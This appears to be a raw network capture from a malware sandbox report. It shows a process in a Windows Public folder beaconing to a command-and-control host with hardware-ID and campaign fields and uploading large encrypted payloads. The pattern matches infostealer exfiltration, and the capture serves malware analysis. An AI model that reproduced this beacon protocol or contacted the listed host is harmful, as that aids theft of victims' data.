                                                                                                                                      2024-11-29 22:10:35 UTC1024INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:35 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=m2cqcndj1ginro9bq5p3b33dul; expires=Tue, 25-Mar-2025 15:57:14 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ql39rLAl%2FR%2Fo7GPJznvy9zn3AVyP90mF77C4rnieOSbesv%2FFOY49XB68e1frG89xsP0Gc6cIN%2FBdYBI0lEjSsOKD2s5tRgHPBj6wINcjwwU7TlpNb1ZSyrflnmuaUpoAyakSqS8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edb2398fc47a-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=172&recv=330&lost=0&retrans=1&sent_bytes=4226&recv_bytes=307228&delivery_rate=117010&cwnd=242&unsent_bytes=0&cid=f72b91a554c857b5&ts=2090&x=0"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.449772172.67.156.2174435448C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:36 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=MEMXNBYC8Q
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20389
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:36 UTC15331OUTData Raw: 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                      Data Ascii: --MEMXNBYC8QContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--MEMXNBYC8QContent-Disposition: form-data; name="pid"3--MEMXNBYC8QContent-Disposition: form-data; name="lid"c2CoW0--bandl--MEMXNBYC8QContent-
                                                                                                                                      2024-11-29 22:10:36 UTC5058OUTData Raw: 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c
                                                                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO@dR<
                                                                                                                                      2024-11-29 22:10:37 UTC1028INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:37 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=6apr9gofsjd5qco8pm1htoturk; expires=Tue, 25-Mar-2025 15:57:15 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9N5R1N%2Ffdb%2BurKiKxkIYoQBRc78rqBm3UnjVYh5MsOFV2UIl0u6kd2L3riV6%2FCoMjgiAesW7VTNX8aa4TgKee%2BaOwgfPX4%2FOD9hlkn%2BqhmaZMflGMyMesNOYs5lVjFtpXNjZ%2F0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edc0fe89436a-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2240&min_rtt=2234&rtt_var=842&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21345&delivery_rate=1307072&cwnd=184&unsent_bytes=0&cid=7e1a315f67e1d927&ts=1063&x=0"
                                                                                                                                      2024-11-29 22:10:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      25192.168.2.449774172.67.156.2174435448C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:39 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=SCOYR4SPLUV5I
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1237
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:39 UTC1237OUTData Raw: 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56
                                                                                                                                      Data Ascii: --SCOYR4SPLUV5IContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--SCOYR4SPLUV5IContent-Disposition: form-data; name="pid"1--SCOYR4SPLUV5IContent-Disposition: form-data; name="lid"c2CoW0--bandl--SCOYR4SPLUV
                                                                                                                                      2024-11-29 22:10:39 UTC1016INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:39 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=pg6u3j164cd9r2d6kqctm2o7lc; expires=Tue, 25-Mar-2025 15:57:18 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNc2YYUNuTdBVtnitNvcxps12kwH%2FM1DB3l2Yi2yoI7GHBiqApNlOkSDo4%2BdsiEsdNaHhmooQiHWoe6rXb4G8CbPi17fNgC8zbSBZ7F5%2B0RgljCghJa3aZvSZlSf4z3SX1MzpY8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edd3cfa543fe-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1808&rtt_var=753&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2151&delivery_rate=1615044&cwnd=236&unsent_bytes=0&cid=7b2b27ee7b95ebb7&ts=849&x=0"
                                                                                                                                      2024-11-29 22:10:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      26192.168.2.449775172.67.156.2174435448C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:41 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=H21GF95SIZLLSB8UP
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 305436
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: 2d 2d 48 32 31 47 46 39 35 53 49 5a 4c 4c 53 42 38 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 48 32 31 47 46 39 35 53 49 5a 4c 4c 53 42 38 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 32 31 47 46 39 35 53 49 5a 4c 4c 53 42 38 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d
                                                                                                                                      Data Ascii: --H21GF95SIZLLSB8UPContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--H21GF95SIZLLSB8UPContent-Disposition: form-data; name="pid"1--H21GF95SIZLLSB8UPContent-Disposition: form-data; name="lid"c2CoW0--bandl-
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: 91 c0 a1 bb 61 8d 8e 14 42 0c 90 a1 0b 80 3c 93 6c 96 65 61 92 62 39 99 4d 76 6e 86 44 9d 11 d3 1c 49 03 6b 6c 5e 7b 44 20 ca cc 24 86 22 7d 2c 87 3f 18 c9 48 35 0e 7f d7 1e 49 2b ba dc 90 e9 0e ee 31 1f e3 a5 cc 35 b1 52 56 fd 01 b5 53 20 84 1d 1c 01 47 20 34 10 87 1e 53 45 00 e2 4d 98 5c 33 49 43 11 3f 57 ad 49 fd e9 f6 dc 61 2b e8 b2 15 e9 3e 34 b7 89 b7 b5 ce 2f 88 d4 f6 ed 3d c7 d4 c3 95 b6 8e b8 d7 bf 28 8c d3 7a 3e ff 54 f3 69 0c 4f 8a 01 77 b1 be 6b a7 60 db e5 74 1d 11 e3 cd a9 dc 9f a9 3e 1a 10 4e 0c b3 d0 5e 91 1e 3b 6e ad e1 eb 0d 26 77 d9 d6 e6 00 bc 5d 52 a9 bb 71 a7 a8 62 41 0f dc 15 84 cd 27 c0 d1 e0 1e b8 0d 43 a1 8b c5 21 8d 0f dd 83 60 65 f0 43 bb f6 f4 61 16 c7 96 8a 90 8f 08 c3 96 b4 50 f5 69 63 66 ba 81 cb 4f 04 b1 0d d5 f9 cd 57 a1
                                                                                                                                      Data Ascii: aB<leab9MvnDIkl^{D $"},?H5I+15RVS G 4SEM\3IC?WIa+>4/=(z>TiOwk`t>N^;n&w]RqbA'C!`eCaPicfOW
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: ab 03 2b 88 85 cb ff 5d 12 83 1f 86 71 06 3e f7 e6 39 ab 0a 59 7b 14 7a 95 26 02 28 18 2d 35 c0 f4 1c 91 b6 38 c0 c8 ba 93 15 76 13 f9 51 66 5a 37 5a 43 1d 8f 07 59 ea 98 ed 73 c8 ac 9e 5c fb 20 8c a5 55 30 3d 68 ce 40 6f e8 0d 81 4b 0f 40 9f 4e 2e b8 1f 71 52 e6 3e df c6 55 34 75 94 d9 7f 6f 96 61 62 98 5d 50 c6 21 40 22 bd 6e 97 01 f7 cd 63 36 07 06 77 01 09 4e a0 68 a6 e6 c8 81 1e 6b ab bc b2 be 6a 5b c3 bd 99 bf f3 02 84 e5 cd 13 97 f4 fd 0d 53 5c 68 2a 4a 6c ea 6d b0 4c 17 d4 98 90 bf 86 c8 b0 97 72 17 1c 77 53 35 a6 50 fa f1 27 37 49 f8 3e b0 dc 41 f9 ad 36 a4 04 13 50 c5 72 5c e2 2e 1f 74 5b c5 6f e5 5f b3 97 cd 8e bb dc ab ac 62 e5 b9 79 f0 47 02 18 84 60 9a d5 d7 ae 45 ac b3 9f 00 77 de b2 a0 88 38 2d 0e c3 35 5f 3f ca d7 c4 d6 3b da 42 29 ea cb
                                                                                                                                      Data Ascii: +]q>9Y{z&(-58vQfZ7ZCYs\ U0=h@oK@N.qR>U4uoab]P!@"nc6wNhkj[S\h*JlmLrwS5P'7I>A6Pr\.t[o_byG`Ew8-5_?;B)
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: b9 f4 43 14 9d f5 15 a3 09 97 4e 22 5d 74 d4 71 a5 76 93 91 82 ae 78 74 93 18 dd 18 ec c7 cc 0b 15 c8 7b ca ab 6c c4 2d 61 8e 22 6d 8c 83 79 e4 55 86 6b a7 a2 56 d8 35 0c 48 5f bd ec 78 68 ec 8e fe 23 57 b0 34 fe ca 29 9d 90 5c ae d8 91 d8 e0 8b 6c 3a ab da 4c 49 11 36 29 5b 6d 27 1c 32 c9 4f f4 79 a5 05 3b b2 f7 17 94 b8 b1 75 89 c5 f9 ed a2 9f 98 9a ef 8e 5e d4 60 be 5a 49 e7 f2 20 b6 39 86 b9 f3 ee fd 67 cb a5 6f 89 99 64 01 01 8e db bf 79 ed 58 50 ff 9c d1 6f 93 ae 65 00 79 7b 59 5b 05 58 87 d8 39 51 b9 fd 19 11 b4 65 6b 7a 7b 91 61 b6 a5 5f 87 e2 bd f4 f6 ba 85 a2 52 15 c9 ed ee b8 dc 2d dc d5 76 f3 14 62 18 39 13 78 9d 89 9b e4 88 42 c7 79 c3 fc 24 37 ec 26 dc 38 03 2b 21 bf 2f a0 e2 fd df f5 63 8e ad 3a de ec 45 5d b4 78 e9 14 13 f3 86 b4 a6 58 d2
                                                                                                                                      Data Ascii: CN"]tqvxt{l-a"myUkV5H_xh#W4)\l:LI6)[m'2Oy;u^`ZI 9godyXPoey{Y[X9Qekz{a_R-vb9xBy$7&8+!/c:E]xX
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: 39 d1 be ce f2 83 24 73 a2 ed 6c 08 5b 73 7c 5f f1 ee b3 b7 ff 7d ad 91 41 0d 08 0e 5e fd 02 ad 6c a4 4d a3 1f 3f 2f a7 67 96 b3 39 fc 84 56 e2 49 4b 30 7c c7 9b 7a bd 87 03 59 d6 e8 ef a8 92 a5 2b 9c 37 57 b0 37 18 7c 25 81 7c 95 01 e5 f6 22 e1 f0 26 73 a5 93 e7 05 ef 31 fe d2 35 b3 8f b9 d6 51 86 bf 15 a4 f8 02 20 cb 42 5a a1 e7 2f 21 ac 4a 0e 25 b7 6d 36 ab b6 2f 80 3e 05 3a 7b 58 9a 9d fc 2c 3d 58 f9 c8 a0 9b 12 b0 62 13 4d 9a 61 9b ca 69 4d ea 03 da 85 57 b5 58 38 04 4f 24 ea 8a 8c 09 96 76 b7 48 32 82 6b dd 26 db f5 93 09 f2 ad 9d ce af 48 ad 09 25 3b e3 26 c9 43 49 3a 11 9a 1d e5 85 1a a0 c8 6d 30 ad af 50 ba 26 7f d1 c0 5e bf 9f 37 5e 8b 6b 5c aa 74 13 0c 57 cb 4e 5a dc 0f e6 1b 1d 96 53 5a 9e 73 c2 bb 34 b8 c3 a4 19 83 1e 91 b6 ab 37 fe 3d 37 02
                                                                                                                                      Data Ascii: 9$sl[s|_}A^lM?/g9VIK0|zY+7W7|%|"&s15Q BZ/!J%m6/>:{X,=XbMaiMWX8O$vH2k&H%;&CI:m0P&^7^k\tWNZSZs47=7
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: 98 c0 dc 6b 57 91 08 f1 4c 31 70 9e 88 d7 b6 78 7a bf 66 3e 0b 5a 69 f8 fb 13 3d 4e 50 38 f1 4d ab ea 25 81 78 bd 19 33 ac a0 dc 6f b5 b4 0e 02 b9 ee 04 07 e1 cd e4 de df 97 3b a3 6b 17 df 38 1f 7c 79 b9 13 f7 e1 e5 65 cd fb b9 ff 74 58 83 e3 02 a8 a3 8e d0 08 d0 bb c3 66 12 70 94 0f 4f 49 b4 2b d2 ae cd 32 90 69 c9 ca 1e a2 23 93 55 12 d3 6c c8 f6 84 01 c0 9a d8 f0 e4 05 02 ed d3 60 2b 2e 58 ee da eb 95 1e 66 7a 43 2b 91 6a e6 d5 f4 d1 f5 73 d6 64 bc e7 c3 d6 3d b3 d9 ec f5 28 18 aa 5d b8 50 68 4e 68 5e 78 55 6b dd 72 df 92 7e 46 88 a8 b8 a8 f0 e6 64 37 26 23 d4 74 d3 3c da d9 04 66 85 02 87 7c 77 bf ec db e0 c6 84 e8 92 dd ef fe 64 ea 6c e3 db 0b f2 2d 87 04 01 a9 df 24 49 69 20 65 d7 9a ac 2f 09 52 1d 36 fd 44 98 9f 4c 60 c3 c5 40 47 84 d5 5b cb df 96
                                                                                                                                      Data Ascii: kWL1pxzf>Zi=NP8M%x3o;k8|yetXfpOI+2i#Ul`+.XfzC+jsd=(]PhNh^xUkr~Fd7&#t<f|wdl-$Ii e/R6DL`@G[
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: f4 fe 39 72 8c 25 4e 90 e1 12 04 a1 10 f8 71 86 4d 97 19 fb 8e 9d 6f ea 75 30 64 d6 e5 95 94 da ca ed df a6 27 29 7a b5 d5 13 25 9c 04 d5 fd cb 02 8d 0f 68 2c 9e 52 5b 19 93 0f 01 96 4e 82 4f c5 f5 0d 86 1e ec 3b 64 a1 fa cd 47 c1 cf a5 29 16 fd e0 30 8c 90 79 43 e7 03 a8 42 62 c4 da 0f 1c c8 7f 3c 4c 30 f1 f2 3d a2 9e e4 31 6e be 96 b2 c3 d3 fb ae 46 66 da ae c3 c4 63 43 e9 11 fc bb 7f a6 7d 35 8a 3c 22 77 ee 6d b2 e7 d5 14 fa 25 25 57 cc fc 35 21 a4 37 bd e5 59 0e b0 e8 a7 e4 f4 b1 c3 84 27 3d dc b7 79 a5 9a 35 b4 a3 d2 27 6d 32 2f ca fc f6 7e 74 22 80 51 79 a1 d0 30 bb e8 f2 2c 6b cf 79 e5 16 06 11 bb b9 b5 8c 27 bb 0f e7 ac 19 b3 1f bf d3 2d 14 82 39 c7 35 bf 2a 68 5c 0d ab c8 0a bc 7f 29 88 97 09 13 c2 6a 33 17 ad 06 b4 45 09 af 6e f8 9d 63 e4 33 f5
                                                                                                                                      Data Ascii: 9r%NqMou0d')z%h,R[NO;dG)0yCBb<L0=1nFfcC}5<"wm%%W5!7Y'=y5'm2/~t"Qy0,ky'-95*h\)j3Enc3
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: e5 7b 86 61 0e c2 4f 94 cc 19 6f 07 8f 64 e8 6b 04 36 05 7f ec f4 c5 01 f3 16 03 6f 3b 96 fc ae 26 62 e1 31 65 e7 05 ef 60 e0 8a 98 fc 57 2b 8a c2 8d 5c de 08 be 43 b8 cb 09 f9 5d c8 4d 28 b2 d5 7c 10 2f 4d 9b 7b 02 2c c5 e8 e1 6e c3 1f 50 ac 21 8b 0e 91 57 ce 82 7e 46 ca f6 20 47 72 c4 3b a8 d7 4b 29 70 9b c9 dc 20 ba 7c 07 6d 57 e0 26 73 65 e2 fe 03 31 e2 f4 a2 97 03 70 53 4c de 2d 97 27 dc e0 40 4e 4c 0d 22 77 df 78 4e d8 8a 20 7b 6c ef 01 2f 21 39 3c da a5 02 bf 0d 9b 9a 4d d2 90 80 7a ff 7a 7f 7b 7b 84 b9 39 5f ee 91 f3 ad ff 19 7f 2f aa f4 c3 df cd da 1b 33 df b9 ae 6c 6a 32 d7 3d e3 ba 00 38 b5 0d 2c ec f3 3c ac f0 2a da 7b 70 af 07 1c 76 f0 6b bc bd 75 49 82 c7 45 a9 1a 39 fb ca aa b6 2c c6 48 69 c7 2a f7 b2 81 f2 1f 89 2c 16 19 a7 ce d6 3f c7 95
                                                                                                                                      Data Ascii: {aOodk6o;&b1e`W+\C]M(|/M{,nP!W~F Gr;K)p |mW&se1pSL-'@NL"wxN {l/!9<Mzz{{9_/3lj2=8,<*{pvkuIE9,Hi*,?
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: 69 5b 87 fb d2 ce 8b 0d f4 7b 7f 6f e1 3e 86 bf f5 3d 6a ed d1 13 6c 41 57 87 10 26 13 98 df 64 72 f5 b1 5b 2d 5e 72 54 5d 2b fe 94 4f bf 48 25 12 d8 68 30 f9 ca e9 52 05 46 cf e5 5c f8 db 60 67 21 da 3e f6 86 ab 5c 10 b1 39 92 00 09 68 32 51 90 f2 f6 87 ea 74 bd 61 43 92 fa 6c 66 d8 1e 45 92 bd 78 38 eb d1 05 09 ea 8e 8c 67 f6 95 fa f2 b1 17 46 0f 9c 53 60 d2 0f 64 87 be bf cf 03 73 5d 0d 43 1f c5 fc b5 6d 0d 67 82 00 1c 6b 9f 0a 10 ef 5a 71 a1 ee d5 83 eb 99 6f 67 ea f2 63 72 0b 60 d2 19 74 fb 7d d5 73 5f 3b 0b 3d 0f 5f 36 0f 5f 4f 33 86 11 e7 4d c6 5d f4 08 30 6c 0f 3f 58 d7 f9 80 70 f6 f8 7e fe a7 4f 3e 6d 1e d0 9f e2 57 9b 99 79 6d cd 32 eb ad e3 4e 8d f8 52 ef 84 48 bb 58 23 65 fb b2 8d a8 23 aa 3a ad b6 60 ec 79 5a 7f fb 93 a3 77 aa df 9a 05 01 97
                                                                                                                                      Data Ascii: i[{o>=jlAW&dr[-^rT]+OH%h0RF\`g!>\9h2QtaClfEx8gFS`ds]CmgkZqogcr`t}s_;=_6_O3M]0l?Xp~O>mWym2NRHX#e#:`yZw
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: fc 52 28 ac 77 d3 82 c1 52 d1 34 95 07 f0 b7 ef 70 7b c8 d8 5e 55 ae 5d 99 de 96 ce 6c 74 ef 18 69 ca 4d e4 f6 98 cb d8 d3 31 34 64 3e 78 e6 a8 32 33 f3 e1 17 e3 25 1e 31 25 9a ee cb 3c 55 86 c3 7c c4 b2 bb 64 84 27 2d 46 9b f7 11 7f 7b bf 7a ae b6 6e 7d 3c 3f 23 dc f3 a8 69 b6 cc ea 97 e3 bf a7 9d f5 cd e0 e0 7c d3 d1 27 57 06 fc 6a 3b b7 e6 21 ec e1 ab c0 0e df f3 ee 1e c3 04 12 e9 29 85 5e 93 c4 03 85 e1 4a 4b 7a eb 4b 22 da 86 5b 22 22 e1 c8 de 76 98 54 cb b7 d8 2d ee c2 30 5a 2b 88 91 13 bb 30 8d c5 ec be 82 c9 87 98 d5 14 43 f5 04 3d 55 5b a2 02 7d 72 68 a2 5d 98 ac 22 56 a6 73 9e 48 f8 73 d0 a6 e1 b3 83 2e 2b 7e 8f 47 1b cc 2f 19 f3 40 43 de bc ff 14 40 36 8d f7 e4 7f 45 37 8e 5e 53 ee 57 df 0c 6c c5 56 4f db 77 1a 02 41 8c 88 c6 9c 2f 91 c4 e9 ec
                                                                                                                                      Data Ascii: R(wR4p{^U]ltiM14d>x23%1%<U|d'-F{zn}<?#i|'Wj;!)^JKzK"[""vT-0Z+0C=U[}rh]"VsHs.+~G/@C@6E7^SWlVOwA/
                                                                                                                                      2024-11-29 22:10:43 UTC1022INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:43 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=lolq74pifvhfc525n269pnkt7q; expires=Tue, 25-Mar-2025 15:57:22 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTBo2U%2FiOJp26SrJjLcFzZH8hsnprml2AyaFhny5wyB%2FZEZaKDEHgmrAT3M8bWX3sNFZYGTbJ9c7nlUWuwyw9qzcTMY8yoJxKvVpY8wvo1D2%2Brow2UJRB6R2p6OdAJRPrU406VA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ede39d2b0f9f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=113&recv=322&lost=0&retrans=1&sent_bytes=4228&recv_bytes=307214&delivery_rate=153490&cwnd=213&unsent_bytes=0&cid=10f16caea3300485&ts=2121&x=0"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      27192.168.2.44977713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:58 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:10:58 UTC471INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:58 GMT
